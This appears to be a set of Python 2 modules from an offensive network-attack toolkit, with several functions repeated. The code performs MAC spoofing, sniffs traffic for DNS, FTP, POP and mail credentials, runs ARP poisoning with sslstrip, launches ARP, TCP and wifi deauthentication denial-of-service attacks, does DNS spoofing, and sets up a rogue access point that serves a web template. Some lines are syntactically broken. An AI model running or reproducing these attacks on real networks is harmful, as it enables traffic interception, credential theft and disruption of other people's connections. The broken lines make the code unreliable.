def Main(): MAC="" picks = ['katana','k4tan4','KAtAn4','K4TanA','K4TaNA','KATANA','ANATAK','|<474/\/A'] a = hashlib.md5(random.choice(picks)) b = a.hexdigest() as_int = int(b, 16) random.seed(bin(as_int)[2:]) mac = [ 0x00, 0x16, 0x3e, random.randint(0x00, 0x7f), random.randint(0x00, 0xff), random.randint(0x00, 0xff) ] if init.var['r'] == "enable":MAC=':'.join(map(lambda x: "%02x" % x, mac)) if init.var['m']!="null" and init.var['m']!="enable": if checkMAC(init.var['m']):MAC=init.var['m'] if checkDevice(init.var['i']): printAlert(0,"Changing MAC to "+init.var['i']) printAlert(0,"MAC to Change "+MAC) sysc("sudo airmon-ng check kill >/dev/null 2>&1") sysc("sudo ifconfig "+init.var['i']+" down >/dev/null 2>&1") sysc("sudo ifconfig "+init.var['i']+" hw ether "+MAC+" >/dev/null 2>&1") sysc("sudo ifconfig "+init.var['i']+" up >/dev/null 2>&1") sysc("sudo service NetworkManager start >/dev/null 2>&1") printAlert(3,"MAC Changed") return
def main(run): try: if init.var['filter'] == "DNS": FILTER = "udp or port 53" elif init.var['filter'] == "FTP": FILTER = "port 21" elif init.var['filter'] == "ALL": FILTER = "udp or tcp" elif init.var['filter'] == "POP": FILTER = "port 110" elif init.var['filter'] == "HTTP": FILTER = "port 80 or 8080" elif init.var['filter'] == "MAIL": FILTER = "port 25 or 110 or 143" else: printAlert( 1, "Type not allow, use show options or sop and see Auxiliar help." ) FILTER = "udp or tcp" return if checkDevice(init.var['interface']): print " " + colors[4] + ( "TIME: %-*s ID: PRO:%-*s SRC: %-*s DST: %-*s PORT: %-*s HOST: TYPE: PATH:" % (4, "", 3, "", 16, "", 16, "", 5, "")) + colors[0] while True: sniff(filter=FILTER, prn=callback, store=0, iface=init.var['interface']) except KeyboardInterrupt: sys.exit()
def main(run): if isConect() and checkDevice(init.var['drive']): printAlert(0,"Starting ARP Poisoning...") Subprocess("ettercap -T -M ARP /"+init.var['target']+"// /"+init.var['gateway']+"// -i "+init.var['drive']) raw_input(printAlert(8,"Stop Attack ARP (PRESS ANY KEY)")) commands.getoutput("killall ettercap")
def Main(): MAC = "" picks = [ 'katana', 'k4tan4', 'KAtAn4', 'K4TanA', 'K4TaNA', 'KATANA', 'ANATAK', '|<474/\/A' ] a = hashlib.md5(random.choice(picks)) b = a.hexdigest() as_int = int(b, 16) random.seed(bin(as_int)[2:]) mac = [ 0x00, 0x16, 0x3e, random.randint(0x00, 0x7f), random.randint(0x00, 0xff), random.randint(0x00, 0xff) ] if init.var['r'] == "enable": MAC = ':'.join(map(lambda x: "%02x" % x, mac)) if init.var['m'] != "null" and init.var['m'] != "enable": if checkMAC(init.var['m']): MAC = init.var['m'] if checkDevice(init.var['i']): printAlert(0, "Changing MAC to " + init.var['i']) printAlert(0, "MAC to Change " + MAC) sysc("sudo airmon-ng check kill >/dev/null 2>&1") sysc("sudo ifconfig " + init.var['i'] + " down >/dev/null 2>&1") sysc("sudo ifconfig " + init.var['i'] + " hw ether " + MAC + " >/dev/null 2>&1") sysc("sudo ifconfig " + init.var['i'] + " up >/dev/null 2>&1") sysc("sudo service NetworkManager start >/dev/null 2>&1") printAlert(3, "MAC Changed") return
def main(run): if isConect() and checkDevice(init.var['interface']): printAlert(0,"Starting ARP D.O.S attack...") Subprocess("ettercap -Tq -P rand_flood /"+init.var['target']+"// /"+init.var['gateway']+"// -i "+init.var['interface']) raw_input(printAlert(8,"to Stop ARP D.O.S Attack (PRESS [ENTER])\n")) commands.getoutput("killall ettercap")
def main(run): if isConect() and checkDevice(init.var['interface']): printAlert(0, "Starting ARP D.O.S attack...") Subprocess("ettercap -Tq -P rand_flood /" + init.var['target'] + "// /" + init.var['gateway'] + "// -i " + init.var['interface']) raw_input(printAlert(8, "to Stop ARP D.O.S Attack (PRESS [ENTER])\n")) commands.getoutput("killall ettercap")
def main(run): if isConect() and checkDevice(init.var['interface']): commands.getoutput("echo 1 > /proc/sys/net/ipv4/ip_forwar") printAlert(0,"Starting WEB D.O.S Attack in LAN") Subprocess("tcpkill -i "+init.var['interface']+" -9 host "+init.var['target']) raw_input(printAlert(8,"to Stop WEB D.O.S Attack (PRESS ANY KEY)\n")) commands.getoutput("killall tcpkill") commands.getoutput("echo 0 > /proc/sys/net/ipv4/ip_forwar") # END CODE MODULE ############################################################################################
def main(run): if checkDevice(init.var['drive']): if init.var['target'] == "ALL": Subprocess("aireplay-ng -0 0 -a "+init.var['bssid']+" "+init.var['drive']) elif init.var['target'] == "ALL": Subprocess("aireplay-ng -0 0 -a "+init.var['bssid']+" -c "+init.var['target']+" "+init.var['drive']) else: init.var['target'] = "ALL" printAlert(1,"Type not allow, use show options or sop and see Auxiliar help.") return printAlert(0,"Starting attack to "+init.var['target']+" with [aireplay-ng]") raw_input(printAlert(8,"to stop DOS Attack (PRESS ANY KEY)\n"))"killall aireplay-ng", shell=True)
def main(run): if init.var['filter'] == "DNS" : FILTER = "udp or port 53" elif init.var['filter'] == "FTP" : FILTER = "port 21" elif init.var['filter'] == "ALL" : FILTER = "udp or tcp" elif init.var['filter'] == "POP" : FILTER = "port 110" else: printAlert(1,"Type not allow, use show options or sop and see Auxiliar help.") FILTER = "udp or tcp" return if checkDevice(init.var['interface']): print " "+colors[10]+" #\t"+colors[4]+"PROTOCOL SOURCE\t\tDESTINE\t\tDATA "+colors[0] while True:sniff(filter=FILTER, prn=callback, store=0, iface=init.var['interface'])
def main(run): if isConect() and checkDevice(init.var['interface']): Loadingfile(init.var['hostfile']) open(init.var['hostfile'],'r') printAlert(0,"Starting DNS spoofing [dnsspoof].") commands.getoutput("iptables --flush -t nat") commands.getoutput("sudo fuser -kuv 53/udp >/dev/null 2>&1 ") commands.getoutput("echo 1 > /proc/sys/net/ipv4/ip_forward") Subprocess("dnsspoof -i "+init.var['interface']+" -f "+init.var['hostfile']) raw_input(printAlert(8,"to Stop DNS Spoof Attack (PRESS ANY KEY)\n")) commands.getoutput("killall dnsspoof") commands.getoutput("echo 0 > /proc/sys/net/ipv4/ip_forward") commands.getoutput("iptables --flush -t nat")
def main(run): if isConect() and checkDevice(init.var['interface']): Loadingfile(init.var['hostfile']) open(init.var['hostfile'], 'r') printAlert(0, "Starting DNS spoofing [dnsspoof].") commands.getoutput("iptables --flush -t nat") commands.getoutput("sudo fuser -kuv 53/udp >/dev/null 2>&1 ") commands.getoutput("echo 1 > /proc/sys/net/ipv4/ip_forward") Subprocess("dnsspoof -i " + init.var['interface'] + " -f " + init.var['hostfile']) raw_input(printAlert(8, "to Stop DNS Spoof Attack (PRESS ANY KEY)\n")) commands.getoutput("killall dnsspoof") commands.getoutput("echo 0 > /proc/sys/net/ipv4/ip_forward") commands.getoutput("iptables --flush -t nat")
def Main(): savedefaultrules() if init.var['t'] == "enable": startTOR() if init.var['r'] == "enable": restoreiptables() if init.var['c'] == "enable": cleanIptables() if checkDevice(init.var['i']): if init.var['p'] == "enable" and if init.var['o'] == "enable": p0rt = init.var['p'] host = init.var['o'] intf = init.var['i'] prox2ip(host,port,ip) else: showhelp()
def main(run): if isConect() and checkDevice(init.var['interface']): printAlert(0,"Starting ARP Poisoning [ettercap].") commands.getoutput("iptables --flush -t nat") commands.getoutput("echo 1 > /proc/sys/net/ipv4/ip_forward") Subprocess("ettercap -T -M ARP /"+init.var['target']+"// /"+init.var['gateway']+"// -i "+init.var['interface']) if init.var['https']: printAlert(0,"Starting SSL Capturing [sslstrip].") commands.getoutput("sudo fuser -kuv 10000/tcp >/dev/null 2>&1 ") commands.getoutput("echo 1 > /proc/sys/net/ipv4/ip_forward") commands.getoutput("iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000") Subprocess("sslstrip") raw_input(printAlert(8,"to Stop ARP Attack (PRESS ANY KEY)\n")) commands.getoutput("killall ettercap") commands.getoutput("killall sslstrip") commands.getoutput("echo 0 > /proc/sys/net/ipv4/ip_forward") commands.getoutput("iptables --flush -t nat")
def main(run): if init.var['filter'] == "DNS": FILTER = "udp or port 53" elif init.var['filter'] == "FTP": FILTER = "port 21" elif init.var['filter'] == "ALL": FILTER = "udp or tcp" elif init.var['filter'] == "POP": FILTER = "port 110" else: printAlert( 1, "Type not allow, use show options or sop and see Auxiliar help.") FILTER = "udp or tcp" return if checkDevice(init.var['interface']): print " " + colors[10] + " #\t" + colors[ 4] + "PROTOCOL SOURCE\t\tDESTINE\t\tDATA " + colors[0] while True: sniff(filter=FILTER, prn=callback, store=0, iface=init.var['interface'])
def main(run): if isConect() and checkDevice(init.var['interface']): printAlert(0, "Starting ARP Poisoning [ettercap].") commands.getoutput("iptables --flush -t nat") commands.getoutput("echo 1 > /proc/sys/net/ipv4/ip_forward") Subprocess("ettercap -T -M ARP /" + init.var['target'] + "// /" + init.var['gateway'] + "// -i " + init.var['interface']) if init.var['https'] == "true": printAlert(0, "Starting SSL Capturing [sslstrip].") commands.getoutput("sudo fuser -kuv 10000/tcp >/dev/null 2>&1 ") commands.getoutput("echo 1 > /proc/sys/net/ipv4/ip_forward") commands.getoutput( "iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000" ) Subprocess("sslstrip") raw_input(printAlert(8, "to Stop ARP Attack (PRESS ANY KEY)\n")) commands.getoutput("killall ettercap") commands.getoutput("killall sslstrip") commands.getoutput("echo 0 > /proc/sys/net/ipv4/ip_forward") commands.getoutput("iptables --flush -t nat")
def main(run): if checkDevice(init.var['drive']) and CheckAPmode(): Loadingfile(init.var['template']) process=commands.getoutput("airmon-ng check $INTERFACE | tail -n +8 | grep -v \"on interface\" | awk '{ print $2 }'") printAlert(0,"Killing proccess on interface") process=process.split("\n") for p in process: commands.getoutput("kilall "+p) rangos=init.var['ip_range'].split(".") rango=rangos[0]+"."+rangos[1]+"."+rangos[3]+".1" rangov=rangos[0]+"."+rangos[1]+"."+rangos[3] printAlert(0,"Setting tables ["+rango+"]") commands.getoutput("ifconfig "+init.var['drive']+" up") commands.getoutput("ifconfig "+init.var['drive']+" "+init.var['ip_range']+" netmask") commands.getoutput("route add -net "+rango+" netmask gw "+init.var['ip_range']) commands.getoutput("echo \"1\" > /proc/sys/net/ipv4/ip_forward") commands.getoutput("iptables --flush") commands.getoutput("iptables --table nat --flush") commands.getoutput("iptables --delete-chain") commands.getoutput("iptables --table nat --delete-chain") commands.getoutput("iptables -P FORWARD ACCEPT") commands.getoutput("iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination "+init.var['ip_range']+":80") commands.getoutput("iptables -t nat -A POSTROUTING -j MASQUERADE") commands.getoutput("echo interface="+init.var['drive']+" > tmp/hostapd.conf") commands.getoutput("echo driver=nl80211 >> tmp/hostapd.conf") commands.getoutput("echo ssid="+init.var['essid']+" >> tmp/hostapd.conf") commands.getoutput("echo channel="+init.var['channel']+" >> tmp/hostapd.conf") commands.getoutput("echo authoritative\;> tmp/dhcpd.config") commands.getoutput("echo default-lease-time 600\;>> tmp/dhcpd.config") commands.getoutput("echo max-lease-time 7200\;>> tmp/dhcpd.config") commands.getoutput("echo subnet "+rangov+".0 netmask { >> tmp/dhcpd.config") commands.getoutput("echo option broadcast-address "+rangov+".255\;>> tmp/dhcpd.config") commands.getoutput("echo option routers "+rango+"\;>> tmp/dhcpd.config") commands.getoutput("echo option subnet-mask\;>> tmp/dhcpd.config") commands.getoutput("echo option domain-name-servers "+rango+"\;>> tmp/dhcpd.config") commands.getoutput("echo range "+rangov+".100 "+rangov+".250\;>> tmp/dhcpd.config") commands.getoutput("echo }>> tmp/dhcpd.config") printAlert(0,"Starting Apache Server "+status_cmd("service apache2 start")) printAlert(0,"Coping Files to Server "+status_cmd("cp -r "+init.var['template']+"* "+PATCH_WWW)) printAlert(0,"Starting Access Point ["+init.var['essid']+"]") Subprocess("hostapd tmp/hostapd.conf") printAlert(0,"Starting DHCP server") Subprocess("dhcpd -d -f -cf tmp/dhcpd.config") printAlert(0,"Starting DOS attack to "+init.var['bssid']) Subprocess("aireplay-ng -0 0 -a "+init.var['bssid']+" "+init.var['drive']) print(printAlert(8,"(PRESS Ctrol+C) to stop DOS Attack\n")) DNSFAKE() commands.getoutput("killall dhcpd") commands.getoutput("killall hostapd") commands.getoutput("killall aireplay-ng") commands.getoutput("iptables --flush") commands.getoutput("iptables --table nat --flush") commands.getoutput("iptables --delete-chain") commands.getoutput("iptables --table nat --delete-chain") for p in process: commands.getoutput("service "+p+" start") printAlert(0,"Removing files "+status_cmd("rm -r "+PATCH_WWW+"* ; rm tmp/hostapd.conf; rm tmp/dhcpd.config")) printAlert(0,"Stoping Apache Server "+status_cmd("service apache2 stop")) Space()